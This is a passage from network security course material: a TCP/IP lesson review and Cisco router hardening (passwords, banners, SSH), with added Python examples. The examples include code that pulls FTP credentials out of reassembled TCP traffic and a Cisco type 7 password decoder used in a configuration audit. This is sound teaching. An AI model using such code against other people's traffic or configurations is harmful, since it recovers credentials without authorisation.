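Everything Task 2H-2 has you read in Network Monitor can be checked mechanically. The Python example below is added here to do that; it is not code from the course. It builds a TCP-only model of the session described in the task (client port 2025 to server port 21, client initial sequence number 0x7A5487B0, user "test user", password "plaintext"), verifies that the first three segments form a valid three-way handshake with consistent sequence and acknowledgement numbers, and then reassembles the client-to-server stream in sequence order to pull out the USER and PASS lines, which is all a sniffer has to do to recover the credentials. The server's initial sequence number, window size, banner text and the four-segment teardown at the end are assumed values constructed for the example; the Ethernet and IP headers a real capture carries are left out.

```python
"""Classify the segments of a TCP session and pull the FTP credentials out of it.

Added example for Task 2H-2; it is not part of the course materials. The
segments are constructed to mirror the capture the task describes: client port
2025 to server port 21, client ISN 0x7A5487B0, user 'test user', password
'plaintext'. The server ISN, window size and banner text are assumed. Only the
TCP layer is built and parsed."""
import struct

TCP_FMT = "!HHIIBBHHH"  # ports, seq, ack, data offset, flags, window, checksum, urgent
FIN, SYN, RST, PSH, ACK = 0x01, 0x02, 0x04, 0x08, 0x10
MASK32 = 0xFFFFFFFF


def build_segment(sport, dport, seq, ack, flags, payload=b""):
    """20-byte TCP header (no options, checksum left 0) followed by payload."""
    return struct.pack(TCP_FMT, sport, dport, seq & MASK32, ack & MASK32,
                       5 << 4, flags, 8192, 0, 0) + payload


def parse_segment(seg):
    sport, dport, seq, ack, off_res, flags, win, _, _ = struct.unpack(TCP_FMT, seg[:20])
    hlen = (off_res >> 4) * 4
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack,
            "flags": flags, "window": win, "payload": seg[hlen:]}


def flag_names(flags):
    names = [(SYN, "SYN"), (ACK, "ACK"), (PSH, "PSH"), (FIN, "FIN"), (RST, "RST")]
    return "+".join(n for bit, n in names if flags & bit) or "none"


def handshake_ok(segs):
    """True if the first three segments are SYN, SYN+ACK, ACK with numbers that
    agree: each ACK is the other side's sequence number plus one, because the
    SYN itself consumes one sequence number."""
    if len(segs) < 3:
        return False
    a, b, c = (parse_segment(s) for s in segs[:3])
    return (a["flags"] == SYN and b["flags"] == SYN | ACK and c["flags"] == ACK
            and b["ack"] == (a["seq"] + 1) & MASK32
            and c["seq"] == (a["seq"] + 1) & MASK32
            and c["ack"] == (b["seq"] + 1) & MASK32)


def ftp_credentials(segs, server_port=21):
    """Reassemble the client->server control stream in sequence order and return
    the USER and PASS arguments: the cleartext exposure the task points out."""
    by_seq = {}
    for p in map(parse_segment, segs):
        if p["dport"] == server_port and p["payload"]:
            by_seq[p["seq"]] = p["payload"]  # a retransmission simply overwrites
    stream = b"".join(by_seq[k] for k in sorted(by_seq))  # demo: no 32-bit wrap handling
    creds = {}
    for line in stream.decode("latin-1").splitlines():
        verb, _, arg = line.partition(" ")
        if verb.upper() in ("USER", "PASS"):
            creds[verb.upper()] = arg
    return creds


def sample_session():
    """Handshake, login, QUIT and four-step teardown, in capture order."""
    cseq, sseq = 0x7A5487B0, 0x2B67D1A0  # client ISN from the task; server ISN assumed
    segs = [build_segment(2025, 21, cseq, 0, SYN),
            build_segment(21, 2025, sseq, cseq + 1, SYN | ACK),
            build_segment(2025, 21, cseq + 1, sseq + 1, ACK)]
    cseq, sseq = cseq + 1, sseq + 1
    dialogue = [("s", b"220 FTP server ready\r\n"), ("c", b"USER test user\r\n"),
                ("s", b"331 Password required for test user.\r\n"), ("c", b"PASS plaintext\r\n"),
                ("s", b"230 User test user logged in.\r\n"), ("c", b"QUIT\r\n"),
                ("s", b"221 See ya later\r\n")]
    for who, data in dialogue:
        if who == "c":
            segs.append(build_segment(2025, 21, cseq, sseq, PSH | ACK, data))
            cseq += len(data)
        else:
            segs.append(build_segment(21, 2025, sseq, cseq, PSH | ACK, data))
            sseq += len(data)
    segs.append(build_segment(2025, 21, cseq, sseq, FIN | ACK))  # client FIN
    cseq += 1
    segs.append(build_segment(21, 2025, sseq, cseq, ACK))        # server ACKs it
    segs.append(build_segment(21, 2025, sseq, cseq, FIN | ACK))  # server FIN
    sseq += 1
    segs.append(build_segment(2025, 21, cseq, sseq, ACK))        # client ACKs it
    return segs


if __name__ == "__main__":
    segs = sample_session()
    for i, p in enumerate(map(parse_segment, segs), 1):
        print("%2d %5d->%-5d %-8s seq=%#010x ack=%#010x %r" % (
            i, p["sport"], p["dport"], flag_names(p["flags"]), p["seq"], p["ack"], p["payload"][:24]))
    print("handshake valid:", handshake_ok(segs), "credentials:", ftp_credentials(segs))
```

The printed listing reproduces the shape of ftp.cap: SYN, SYN+ACK, ACK, the PSH+ACK segments carrying the FTP dialogue, and the FIN/ACK pairs from each side at the end. The credential extraction needs nothing but the port number and the payload bytes, which is why the task's remark about securing authentication matters.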
Summary
In this lesson, you looked deep into the structure of the TCP/IP protocol.
You reviewed the RFCs associated with IP, ICMP, TCP, and UDP. You then
used Network Monitor and Wireshark to capture and analyze IP packets.
You examined captures associated with network traffic. You learned to read
the actual data being transmitted between two or more hosts. Finally, you
analyzed a complete session, frame-by-frame.
Lesson Review
2A How many layers are in the OSI Model?
Seven.
How many layers are in the TCP/IP Model?
Four.
What are the assignable classes of IP addresses?
A, B, and C.
What are the three private ranges of IP addresses, as defined in the RFCs?
The three ranges set aside by RFC 1918 are:
a. 10.0.0.0 to 10.255.255.255
b. 172.16.0.0 to 172.31.255.255
c. 192.168.0.0 to 192.168.255.255
2B How many control flags are in a TCP header?
Six, as originally specified: URG, ACK, PSH, RST, SYN, and FIN. (RFC 3168 later added the CWR and ECE bits for explicit congestion notification.)
What is the function of an acknowledgement number?
To tell the sender the next sequence number the receiver expects. Its value is the sequence number of the received segment plus the number of bytes received (plus one for a SYN or FIN), so it acknowledges everything up to that byte.
How many steps are required to establish a TCP connection?
Three.
How many steps are required to tear down a TCP connection?
Four.
What are the two main views of Network Monitor?
Display View and Capture View.
2C What is the first field that is read by the computer in the IP header?
Version.
What is the Protocol ID of ICMP in the IP header?
1.
What is the Protocol ID of TCP in the IP header?
6.
What is the Protocol ID of UDP in the IP header?
17.
2D What is the first field that is read by the computer in the ICMP message?
Type.
How many bits make up the Type eld?
Eight.
How many bits make up the Code eld?
Eight.
2E What is the first field that is read by the computer in the TCP header?
Source Port Number.
How many control bits are in the TCP header?
Six.
How many bits is the Sequence Number?
32.
How many bits is the Acknowledgement Number?
32.
2F What is the first field that is read by the computer in the UDP header?
Source Port Number.
What is the UDP header and data encapsulated in?
An IP datagram.
How many bits are both the source and destination port numbers?
16.
What is in the payload of the tftp.cap file that you analyzed?
A Cisco router configuration and access lists.
2G In the fragment.cap file that you analyzed, how do you suppose this fragmentation happened?
By a user sending a large ping. (See the file fragment.txt, in the same folder as fragment.cap, to understand how this was initiated.)
Why is there no upper-layer protocol list in the Detail pane for frames 2
through 13?
These are the subsequent fragments whose upper-layer protocol is referred
to in the rst fragment; therefore, they do not have any header information
other than IP.
What was the upper-layer protocol that caused the fragmentation?
ICMP.
2H In the FTP capture file that you analyzed in this topic, what pair of sockets are involved in the initial three-way handshake?
On the client: IP address 172.16.30.2, port 2025. On the FTP Server: IP address 172.16.30.1, port 21.
In the FTP capture file that you analyzed in this topic, what pair of sockets are involved in the exchange of FTP data in response to the request for directory listing?
On the FTP Server: IP address 172.16.30.1, port 20. On the client: IP address 172.16.30.2, port 2026.
In the FTP capture file that you analyzed in this topic, what frames indicate that a three-way handshake is taking place between the FTP server and the client in preparation for the sending of FTP data in response to the request for the file textfile.txt?
Frames 35, 36, and 37.
LESSON 3
Routers and Access Control Lists
Overview
In this lesson, you will be introduced to the functioning of routers and routing protocols. The examples in this lesson are shown on Cisco Routers, specifically the 2500 series. You will examine the issues of securing routers and routing protocols. You will remove unneeded services and create access control lists to manage and secure the network. The lesson ends with the creation of logging options on the Cisco router.
Objectives
To understand the functions of routers and routing protocols, you will:
3A Configure fundamental router security.
You will create the required configurations to secure connections, create banners, and implement SSH.
3B Examine principles of routing.
You will capture routing protocols and analyze the IP and MAC relationship in a routed environment.
3C Configure the removal of services and protocols.
You will create the required configurations to harden the core services and protocols on a Cisco router.
3D Examine the function of Access Control Lists on a Cisco router.
You will create wildcard masks to be used in conjunction with the implementation of Access Control Lists.
3E Implement Cisco Access Control Lists.
You will create the required configurations to implement Access Control Lists to defend against network attacks on a Cisco router.
3F Configure logging on a Cisco router.
You will create the required configurations to enable logging on a Cisco router.
Data Files
ping-arp-mac.cap
rip update.cap
ripv2withAuthentication.cap
PuTTy.exe
Lesson Time
6 hours
Lesson 3: Routers and Access Control Lists 95
Topic 3A
Fundamental Cisco Security
Although this lesson is not designed to make you a Cisco or a routing expert, you
will become familiar with the core functions of routers and how to best harden
this critical component of the infrastructure.
Cisco Router Language
A Cisco router has one or more connections to networks. Each of these connections is referred to as an interface. To further define this interface concept, Cisco uses the type of interface as part of the name as well. Therefore:
An interface that is connected to an Ethernet segment of the network always
starts with an E.
A Fast Ethernet interface always starts with an F.
An interface that is connected to a serial connection always starts with an S.
An interface that is connected to a Token Ring segment always starts with
To.
Along with the interface type, Cisco interfaces are numbered. The interface numbering begins with a zero. In other words:
The first Ethernet interface on the router is known as E0.
Likewise, the first serial interface on the router is S0.
Finally, the first Token Ring interface on the router is To0.
Cisco Operating System
The Cisco routers have their own operating system, which is known as the IOS (Internetwork Operating System). The IOS is found on all Cisco routers and can be uploaded to or downloaded from a TFTP server. It is common to copy the IOS image to the TFTP server as a quick backup in the event that the running IOS gets corrupted. Keep in mind that TFTP has neither authentication nor encryption, so the TFTP server should be reachable only from a management network, and an image copied back onto the router should be checked against the MD5 value Cisco publishes for it before it is booted.
Most of the current routers in production are running versions 11.x or 12.x of the Cisco IOS. When Cisco makes a major release of the IOS, it is assigned a number, such as 11 or 12, and a major release is normally identified by a two-part number such as 11.2 or 12.2. You might also see an IOS listed as version 12.0(3). The 3 in parentheses is the third maintenance revision of the 12.0 release. Maintenance revisions are released every eight weeks and contain bug fixes and/or updates, as Cisco dictates.
Accessing the Router
Cisco provides a wide variety of access points for their routers. Each method of
access can provide the ability to view the router differently. Some methods
require the network to be functioning and active, while others do not require any
network connectivity at all. The methods of access include the console port, the
auxiliary port, or network access. Network access can, in turn, include VTY (ter-
minal access), HTTP, TFTP, and SNMP. Each of these methods is detailed here:
The console port is the main point of access on a Cisco router. This is a direct physical connection, requiring the person using the port to be present at the router. This is the connection method used to create the initial configuration and in the event of an emergency, such as password recovery. Because it requires physical presence, the console port is not practical as the primary method of day-to-day access; the same physical access also allows password recovery, so the router itself must be kept in a secured location.
bug: An unwanted and unintended property of a program or piece of hardware, especially one that causes it to malfunction.
SNMP: (Simple Network Management Protocol) A protocol used to monitor and manage network communications devices over TCP/IP.
The auxiliary port can be used to connect to the router via a modem. This can be a functional method of accessing the router if the primary network is down and you are not able to gain physical access to the router. Because a modem on the auxiliary port answers to anyone who dials its number, the aux line must carry the same login and password controls as the VTY lines, or be disabled if it is not used.
The VTY sessions provide for terminal access to the router. These connections require the network to be functioning to provide access. The most common method of accessing a VTY session is telnet, although, for security purposes, SSH is supported and is recommended. There are five VTY ports on the router by default, and they are numbered 0 through 4. In this course, access will be provided by using VTY sessions.
Other network access points like HTTP, TFTP, and SNMP are also supported on newer versions of the IOS. HTTP can be used if the router runs as a web server, authenticating users for access. TFTP is used for loading IOS and configuration files, and SNMP can be used in full network management configurations.
Modes of Operation
In the router, there are several different modes an administrator can use. These range from simple, informational modes, to the complex modes of router configuration. Several of the different modes are listed below:
User Mode: In this mode, users can see some status information about the router, but will not be able to make any significant changes to the router. The prompt for User Mode looks like this: Router>.
Enable Mode: In this mode, users can make more significant changes to the router, including some of the router configuration options. The prompt for Enable Mode looks like this: Router#.
Global Configuration Mode (also known as Configure Terminal Mode): In this mode, users can make configuration changes that will affect the entire router. The prompt for Global Mode looks like this: Router(config)#.
Generally, once you connect to the router, you will move to Enable Mode right away, since that is where much of the router management happens. As a side note, Enable Mode is often called Privileged Mode in text. So, you can consider Enable Mode and Privileged Mode to mean the same thing: the next level of router access beyond User Mode.
Configuration Fragments
In this lesson, you will see many examples of configurations of the router. It is not practical to list every step and every line entered for every option. Therefore, what you will see are called configuration fragments.
For example, to navigate to an Interface Mode of a router, the following commands are required:
1. Connect to the router via an access method, such as telnet: Telnet 10.10.10.10.
2. Enter the password for VTY access: L3tm3!n.
3. Enter the password for Enable Mode: P0w3r.
4. Enter the command for Configure Terminal Mode: Configure Terminal.
5. Enter the command for Interface Mode: Interface Ethernet 0.
In this course, the command sequence listed previously will not be described line-by-line but with a configuration fragment. So, the steps to access Interface Mode will look like this:
1. Router#Config Terminal
2. Router(Config)#Interface Ethernet0
This configuration fragment goes right to the concept, or function, of the discussion. In this example, you cannot be in Enable Mode (identified by the Router# prompt) without first accessing the router (probably by using Telnet) and entering the required credentials.
Navigating in the Router
The Cisco router interface is a command-line interface, with a format that is simi-
lar to UNIX. For those of you getting started with the router, if you get lost in
the command structure, here are some of the more common commands to learn
and use.
First is the question mark (?).
This simple single character command will list for you all the available
options at a given point in the router. For example, if you enter the
question mark at the User Mode prompt, like so: Router>?, you will
be given an alphabetical list of the commands that are options at this
point. This command will yield a different set of commands than using
the same question mark at the Enable Mode prompt (Router#?).
If you recall the first letter of a command, but not the entire string, again the question mark can come in handy. For example, if you are trying to enter Enable Mode, but forgot how to spell enable, you can use the following command: Router>E? This command lists all the commands starting with the letter E with brief descriptions of their functions.
Other shortcuts to use are the Up Arrow and Down Arrow keys. Using these
will scroll you through commands you have entered into the router for quick
access.
Finally, using key combinations can be helpful as well. Two examples of key
combinations are Ctrl+A and Ctrl+E.
Using the Ctrl+A key combination moves the cursor to the beginning of
a command line.
Using the Ctrl+E key combination moves the cursor to the end of a
command line.
As an FYI, if the Up Arrow and Down Arrow keys do not function on your
system, you can use the key combination Ctrl+P in place of the Up Arrow
key, and Ctrl+N in place of the Down Arrow key.
Authentication and Authorization
In order for someone to have access to control a router, there must be both
authentication and authorization. It is important to not get these two confused, as
they are so similar. Authentication is the process of identifying a user, generally
granting or denying access. Authorization is the process of dening what a user
can do or is authorized to do. So, a user gains access to the router via authentica-
tion and gains control of the router via authorization.
In Cisco routers, there are two main categories of authentication: the AAA method and the non-AAA method (called traditional by some). AAA stands for Authentication, Authorization, and Accounting.
Earlier, you were introduced to the methods of access, such as console, auxiliary, and VTY sessions. Protecting these lines with a line password, or with a username and password stored locally on the router, is non-AAA authentication. Cisco also classes the original Terminal Access Controller Access Control System (TACACS) and Extended TACACS as non-AAA methods.
AAA methods include TACACS+, RADIUS, and Kerberos. These hand authentication, authorization, and accounting to a central server, which gives you per-user accountability and one place to revoke access, something a local password shared among several administrators cannot provide.
Configuring Access Passwords
Because there are several different methods of accessing the router, in order to
provide security, you must be able to lock down these access points. The rst line
of defense is to provide a password for these forms of access.
Setting the Console Password
Because the console-port connection gives direct access to the router, it must have a strong password. This can be, and usually is, created during the initial setup of the router. In order to set the Console password, you will need to enter Configure Terminal Mode, and then enter the command line console 0. This is what gets you into the mode where the password can be created. The login command tells the router that a password is required, and the password command is used to enter the actual password. Note that a password set this way is stored in the configuration in cleartext (service password-encryption only obfuscates it), so anyone who can read the configuration can read the password. The configuration fragment looks like this:
Router#config terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#
Setting the Enable Passwords
The process for setting the Enable password is similar to the process for setting the Console password. You will notice that the processes in the following sections are all similar; only the object (such as the console or vty) differs.
As to the password itself, there are two different Enable passwords. The first is the standard Enable password; the second is the Enable Secret password. The standard Enable password is kept only for backwards compatibility with old IOS images. If the Enable Secret password has been configured, it takes precedence. The reason the Enable Secret password is preferred is how it is stored: the configuration holds a salted MD5 hash of it (shown as type 5), which cannot be turned back into the password, whereas the standard Enable password is stored in cleartext, or at best in the trivially reversible type 7 form produced by service password-encryption. The configuration fragment for setting the Enable Secret password looks like this:
Router#config terminal
Router(config)#enable secret p@55w0rd
Router(config)#^Z
Router#
Setting the VTY Password
Configuration of the password for the VTY sessions is similar to creating the Console password. Remember that there are five VTY sessions, numbered 0 through 4. When you are setting the VTY password, you can create a password for one or for all of these sessions. In this first configuration fragment, the password is set for just the first VTY session:
Router#config terminal
Router(config)#line vty 0
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#
In the following configuration fragment, the password is set for all VTY sessions, 0 through 4. Note that the process is nearly identical. In practice you should always configure all five lines: an incoming connection is handed to whichever VTY line is free, so a line you left unconfigured is the one an attacker eventually gets.
Router#config terminal
Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password l3tm3!n
Router(config-line)#^Z
Router#
TASK 3A-1
Configuring Passwords
1. Create the configuration fragment that you would use to set the Console password of ACC3$$, and to set all VTY sessions to use the password of +3ln3+.
Router#configure terminal
Router(config)#line console 0
Router(config-line)#login
Router(config-line)#password ACC3$$
Router(config-line)#^Z
Router#
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#login
Router(config-line)#password +3ln3+
Router(config-line)#^Z
Router#
Creating User Accounts
Although for regular operation of the router, individual user accounts are not
required, when you do add them, it allows for another level of control over the
router and over router access.
To create local user accounts, the command syntax is only one line. In organizations where there are multiple people managing the router, this is a solid practice, because each administrator can be identified, and removed, individually. Note that the username ... password form stores the password in cleartext (or as reversible type 7 once service password-encryption is on); the username ... secret form, available on newer IOS releases, stores an MD5 hash instead and should be preferred where it is supported. The following configuration fragment shows the creation of several user accounts:
Router#configure terminal
Router(config)#username Auser password u$3r1
Router(config)#username Buser password u$3r2
Router(config)#username Cuser password u$3r3
Router(config)#username Duser password u$3r4
Router(config)#^Z
Router#
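The preceding sections say that the standard Enable password is kept only for backwards compatibility and that Enable Secret takes precedence because of how it is stored. The Python example below is added here to show why; it is not code from the course. When service password-encryption is enabled, IOS stores line, enable and username passwords as "type 7" strings: two decimal digits giving a start index into a fixed 53-byte key, followed by the password XORed byte by byte with that key, in hex. The example decodes and encodes type 7, then audits a constructed running-config excerpt that uses the passwords from this lesson and reports which credentials are cleartext, which are merely reversible, and which are hashed. The "cisco" test vector is the widely published one; the other encoded strings are produced by this code's own encoder, and the type 5 hashes in the sample configuration are placeholders, not real hashes.

```python
"""Why 'enable password' and 'username ... password' are weak: Cisco type 7.

Added example for this section; it is not part of the course materials. With
'service password-encryption' on, IOS stores line, enable and username
passwords as type 7: two digits giving a start index into a fixed 53-byte
key, then the password XORed with that key, in hex. That hides the password
from a glance at the screen and nothing more. 'enable secret' and
'username ... secret' store a salted MD5 hash (type 5) instead. The 'cisco'
vector is the widely published one; the type 5 hashes below are placeholders."""
import re

XLAT = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decrypt(encoded):
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("malformed type 7 string %r" % encoded)
    seed = int(encoded[:2])
    if seed > 15:  # IOS only ever uses start indexes 0-15
        raise ValueError("seed %d out of range" % seed)
    data = bytes.fromhex(encoded[2:])
    return bytes(b ^ XLAT[(seed + i) % len(XLAT)] for i, b in enumerate(data)).decode("latin-1")


def type7_encrypt(plain, seed=8):
    raw = plain.encode("latin-1")
    body = "".join("%02X" % (b ^ XLAT[(seed + i) % len(XLAT)]) for i, b in enumerate(raw))
    return "%02d%s" % (seed, body)


_LINE = re.compile(
    r"^(enable password|enable secret|password|username \S+ (?:password|secret))"
    r"\s+(?:(\d)\s+)?(\S+)$")


def audit_config(config_text):
    """Return (config line, verdict) for every stored credential in a config.
    Verdicts: 'cleartext', 'type 7, reversible: <password>', 'hashed (type N)'."""
    findings = []
    for raw in config_text.splitlines():
        line = raw.strip()
        m = _LINE.match(line)
        if not m:
            continue
        keyword, ptype, value = m.groups()
        if ptype == "7":
            findings.append((line, "type 7, reversible: " + type7_decrypt(value)))
        elif ptype in ("5", "8", "9"):
            findings.append((line, "hashed (type %s)" % ptype))
        else:  # no type, or type 0: the password is right there
            findings.append((line, "cleartext"))
    return findings


# Constructed running-config excerpt using the passwords from this lesson.
# The $1$ hashes are placeholders, not real MD5 hashes.
SAMPLE_CONFIG = """
service password-encryption
enable secret 5 $1$PLAC$EHOLDERnotarealhash000000
enable password 7 0822455D0A16
username Auser password 7 %s
username Buser secret 5 $1$PLAC$EHOLDERnotarealhash111111
line con 0
 password 7 %s
 login
line vty 0 4
 password l3tm3!n
 login
""" % (type7_encrypt("u$3r1", 3), type7_encrypt("l3tm3!n", 11))

if __name__ == "__main__":
    for line, verdict in audit_config(SAMPLE_CONFIG):
        print("%-48s %s" % (line, verdict))
```

Run against a real running-config (for example the output of show running-config saved to a file), the audit lists every line, enable and username password that an attacker could recover from a configuration backup or a TFTP transfer, which is the practical argument for enable secret, username ... secret, and keeping configuration files as closely guarded as the passwords themselves.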
Implementing Banners
In addition to having proper passwords on the router, it is important to have
adequate warning banners. It is highly recommended that you view these banners
as warning banners and not as welcome banners, as they used to be called. A
warning banner is not designed to be the end-all of security; most people know a
banner will not stop a determined attacker. However, a banner can provide some
legal backing for you and your organization.
There are four general functions that warning banners should provide. Although
you should look to legal counsel for the exact wording, your banner should
address each of these. The banner should:
Not provide useful technical or non-technical information that an attacker
can use.
Inform users of the system(s) that their actions are subject to recording, and
may be used in a court of law.
Define who is and who is not an authorized user of the system(s).
Provide adequate legal standing to both prosecute offenders and protect the
administrators of the equipment.
The following is an example of what a banner could look like for an organiza-
tion:
Warning!!! This system is designed solely for the authorized
users of Company X on official business. Users of this system
understand that there is no expectation of privacy, and that use
of the system may be monitored and recorded. Use of this system
is consent to said monitoring and recording. Users of this
system acknowledge that if monitoring finds evidence of misuse,
abuse, and/or criminal activity, that system operators may
provide monitoring and recording data to law enforcement
officials.
Implementing Cisco Banners
On the Cisco router, there are several types of banners available:
MOTD banner: The MOTD banner is for setting Messages Of The Day. The MOTD banner is shown to all terminal users who are connected to the router, before they are asked to input username and password. This may not be an efficient location for your warning banner if your company literally uses this banner to list day-to-day information. You do not want to be setting the warning banner each and every day, and worrying about missing a day. This banner is used for sending notices to users, such as an upcoming system shutdown for upgrading the IOS.
Login banner: The login banner is where the warning banner should be located. This banner will be shown to each user every time a login attempt happens, after the MOTD banner and before the username or password prompt. The banner is set in Configure Terminal Mode, and uses a beginning and ending delimiter character. The delimiter can cause confusion, but is quite simple: any character can be used as a delimiter, you just must make sure to use the same character at the beginning and the end, and the character must not appear anywhere in the banner text itself, because IOS ends the banner at its first occurrence. (A letter such as C would not work with text containing the word Company; an uncommon character is a safer choice.) In the following configuration fragment, the tilde (~) is used as the delimiter character:
Router#configure terminal
Router(config)#banner login ~
Warning!!! This system is designed solely for the authorized
users of Company X on official business. Users of this system
understand that there is no expectation of privacy, and that
use of the system may be monitored and recorded. Use of this
system is consent to said monitoring and recording. Users of
this system acknowledge that if monitoring finds evidence of
misuse, abuse, and/or criminal activity, that system
operators may provide monitoring and recording data to law
enforcement officials.
~
Router(config)#^Z
Router#
EXEC banner: The EXEC banner is displayed once a user has authenticated and an EXEC session (the command shell, which starts in User Mode) is created, so it is the first thing a logged-in user sees. You can create a new banner, reuse the same warning banner, or whatever else you wish. The process for setting a new banner is nearly identical to the process for the login banner. The difference is in the command. Instead of the command banner login, you use the command banner exec. In the following configuration fragment, you can see the exec banner created, with a delimiter of the pound sign (#):
Router#configure terminal
Router(config)#banner exec #
Reminder!!! When you logged into this system, you
acknowledged that you are an authorized user of Company X
systems. You also acknowledged that your use of this system
may be monitored and recorded. Finally, you agreed that if
misuse, abuse, and/or criminal activity are found while
monitoring, that law enforcement officials may be contacted.
#
Router(config)#^Z
Router#
TASK 3A-2
Configuring Login Banners
1. Create the configuration fragment that you would use to create a login
warning banner. You can include whatever text you like for the banner,
but use the letter B as your delimiter.
A possible response is:
Router#configure terminal
Router(config)#banner login B
Warning!!! This is the login banner for the SCNS TPD class.
If you are not a member of this class, you may not access
this system. Users of this system are advised that nearly
everyone is running packet-capturing utilities and everyone
is watching you!
B
Router(config)#^Z
Router#
SSH Overview
Although Telnet is used in this course (and is often the method of choice for
many administrators), from a security perspective it is not a solid option. This is
because there is no encryption on the session; all commands and responses are
cleartext and can be viewed by any packet-capture utility.
SSH, or Secure Shell, provides a higher level of security on remote connections
to the router. Using RSA public key cryptography, SSH establishes a secure
channel of communication between client and server.
Cisco IOS support for SSH is not present in older versions of the IOS, such as
11.2 and 11.3. Starting with version 12.0(5) with IPSec, support for SSH was
included, and only IOS versions that have IPSec will have SSH support.
In order for SSH sessions to be established, some preparation must take place
on the router. The router must have usernames defined, must have a hostname
defined, and must have a domain name set.
Router Configuration to use SSH
In implementing SSH, you should use Access Control Lists to control VTY
access. A later section fully details Access Control Lists (ACLs). In brief,
an ACL is used to regulate access (denial or permission) to an object on the
router.
In this configuration fragment, ACL 23 is used to define the host that is allowed
to access the router for administration. The host name of the router is simply
Router and the domain will be scp.mil. The username is SSHUser and the
password for this user is No+3ln3+.
Note: Not all versions of the IOS support SSH. Versions that support IPSec also
support SSH.
Lesson 3: Routers and Access Control Lists 103
Router#configure terminal
Router(config)#ip domain-name scp.mil
Router(config)#access-list 23 permit 192.168.51.45
Router(config)#line vty 0 4
Router(config-line)#access-class 23 in
Router(config-line)#exit
Router(config)#username SSHUser password No+3ln3+
Router(config)#line vty 0 4
Router(config-line)#login local
Router(config-line)#exit
Router(config)#
The router configuration is close to being finished, but there is still some work to
be done. RSA must be enabled so that the key pair can be generated and used.
When creating a new key pair, be aware that it may take some time for the pair
to complete. In this fragment, all you will see is the command that creates the key
pair, crypto key generate rsa, the use of 1024 as the number of bits (the Cisco
recommended minimum), and the OK when the calculation is done.
Router#configure terminal
Router(config)#crypto key generate rsa
The name for the keys will be: Router.scp.mil
Choose the size of the key modulus in the range of 360 to 2048
for your General Purpose Keys. Choosing a key modulus greater
than 512 may take a few minutes.
How many bits in the modulus [512]: 1024
Generating RSA keys ...
[OK]
Router(config)#
You have now enabled SSH to run on your router. There are some commands
that you can use to fine-tune the SSH function, and you will need to configure
your client to use SSH.
The following configuration fragment is used to define the time-out, in seconds,
that the server will wait for the client to provide a password. The default is 120
seconds, and the Cisco recommended time is 90 seconds. In this fragment, the
time has been changed to 45 seconds.
Router#configure terminal
Router(config)#ip ssh timeout 45
Router(config)#^Z
Router#
The next fragment is used to dene the number of retries that will be allowed
before the router drops the connection. The default for this setting is 3, and the
maximum is 5. This is a setting that you may rarely change, but in the fragment,
the retries are set to 2, so after the second bad try, the connection is dropped:
Router#configure terminal
Router(config)#ip ssh authentication-retries 2
Router(config)#^Z
Router#
Finally, the following configuration lets the VTY sessions on the router accept both
SSH and Telnet as valid connection types. If you want only SSH to be used, which
is the point here, omit the word telnet from the command.
Router#configure terminal
Router(config)#line vty 0 4
Router(config-line)#transport input ssh telnet
Router(config-line)#^Z
Router#
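The settings in this section can be checked mechanically before a router goes into service. The Python checker below is an added example, not code from the course or from Cisco: it parses a constructed running-config excerpt (the hostname, domain name, ACL 23, username and ip ssh values are the ones used above; the second VTY range, vty 5 15, is constructed to show a weaker case) and reports VTY ranges that still accept Telnet, lack an inbound access-class, or lack login local, next to a hardened copy of the same configuration that produces no findings.

```python
"""Audit the VTY/SSH hardening settings in a Cisco IOS running-config."""

# Constructed running-config excerpts for the example (not from the book).
# WEAK_CONFIG keeps the page's hostname, domain, ACL and username but leaves
# Telnet enabled on vty 0 4 and adds an unrestricted second VTY range.
WEAK_CONFIG = """\
hostname Router
ip domain-name scp.mil
access-list 23 permit 192.168.51.45
username SSHUser password No+3ln3+
ip ssh time-out 45
ip ssh authentication-retries 2
line vty 0 4
 access-class 23 in
 login local
 transport input ssh telnet
line vty 5 15
 login
 transport input telnet
"""

# The same router with the settings the section recommends: SSH only, the
# management ACL and local login applied to every VTY range.
HARDENED_CONFIG = """\
hostname Router
ip domain-name scp.mil
access-list 23 permit 192.168.51.45
username SSHUser password No+3ln3+
ip ssh time-out 45
ip ssh authentication-retries 2
line vty 0 4
 access-class 23 in
 login local
 transport input ssh
line vty 5 15
 access-class 23 in
 login local
 transport input ssh
"""


def parse_vty_blocks(config):
    """Map each 'line vty ...' command to the indented sub-commands under it."""
    blocks = {}
    current = None
    for raw in config.splitlines():
        if not raw.strip():
            continue
        if raw.startswith(" "):          # IOS indents line sub-commands by one space
            if current is not None:
                blocks[current].append(raw.strip())
        else:
            current = raw.strip() if raw.startswith("line vty") else None
            if current is not None:
                blocks[current] = []
    return blocks


def audit_vty_ssh(config):
    """Return (severity, message) findings; an empty list means nothing to fix."""
    findings = []
    top_level = [line.strip() for line in config.splitlines()
                 if line and not line.startswith(" ")]
    if not any(line.startswith("hostname ") for line in top_level):
        findings.append(("high", "no hostname: the RSA key name is hostname.domain"))
    if not any(line.startswith("ip domain-name ") for line in top_level):
        findings.append(("high", "no ip domain-name: RSA keys cannot be generated"))
    if not any(line.startswith("ip ssh time-out ") for line in top_level):
        findings.append(("low", "ip ssh time-out not set; the default is 120 seconds"))
    if not any(line.startswith("ip ssh authentication-retries ") for line in top_level):
        findings.append(("low", "ip ssh authentication-retries not set; the default is 3"))
    for name, cmds in parse_vty_blocks(config).items():
        transport = next((c for c in cmds if c.startswith("transport input")), None)
        if transport is None:
            findings.append(("medium", f"{name}: no transport input line; default depends on IOS version"))
        elif "telnet" in transport.split() or "all" in transport.split():
            findings.append(("high", f"{name}: telnet accepted ({transport})"))
        if not any(c.startswith("access-class ") and c.endswith(" in") for c in cmds):
            findings.append(("medium", f"{name}: no inbound access-class limiting management hosts"))
        if "login local" not in cmds:
            findings.append(("medium", f"{name}: no 'login local'; SSH needs a username to authenticate"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_vty_ssh(WEAK_CONFIG):
        print(f"[{severity}] {message}")
    print("hardened config findings:", audit_vty_ssh(HARDENED_CONFIG))
```

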